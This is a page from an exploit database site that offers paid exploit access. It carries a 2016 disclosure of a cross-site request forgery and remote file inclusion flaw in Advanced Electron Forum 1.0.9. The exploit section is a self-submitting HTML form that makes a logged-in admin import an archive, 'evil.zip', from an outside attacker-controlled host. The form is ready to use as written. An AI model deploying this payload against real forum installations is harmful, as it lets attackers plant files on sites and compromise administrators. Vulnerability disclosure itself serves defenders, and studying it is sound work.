0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery
[+] Credits: hyp3rlinx Vendor: ============================= www.anelectron.com/downloads/ Product: ================================ Advanced Electron Forum v1.0.9 (AEF) Exploit patched current version. Vulnerability Type: ============================ Remote File Inclusion / CSRF CVE Reference: ============== N/A Vulnerability Details: ===================== In Admin control panel there is option to Import Skins and one choice is using a web URL. From AEF: "Specify the URL of the theme on the net. The theme file must be a compressed archive (zip, tgz, tbz2, tar)." However there is no CSRF token or check made that this is a valid request made by the currently logged in user, resulting in arbitrary remote file imports from an attacker if the user visits or clicks an malicious link. Victims will then be left open to arbitrary malicious file downloads from anywhere on the net which may be used as a platform for further attacks... Exploit code(s): =============== <form id="EL-DOWNLOADO" action=" http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import" method="post"> <input type="hidden" name="folderpath" value="../" /> <input type="hidden" name="importtype" value="2" /> <input type="hidden" name="weburl" value=" http://hyp3rlinx.altervista.org/evil.zip" /> <input type="hidden" name="filepath" value="../" /> <input type="hidden" name="uploadtheme" value="" /> <input type="hidden" name="importskin" value="Import" /> <script>document.getElementById('EL-DOWNLOADO').submit()</script> </form> Disclosure Timeline: ====================================== Vendor Notification: NA January 17, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: =============== High Description: ================================================================== Request Method(s): [+] POST Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF) # 0day.today [2024-12-25] #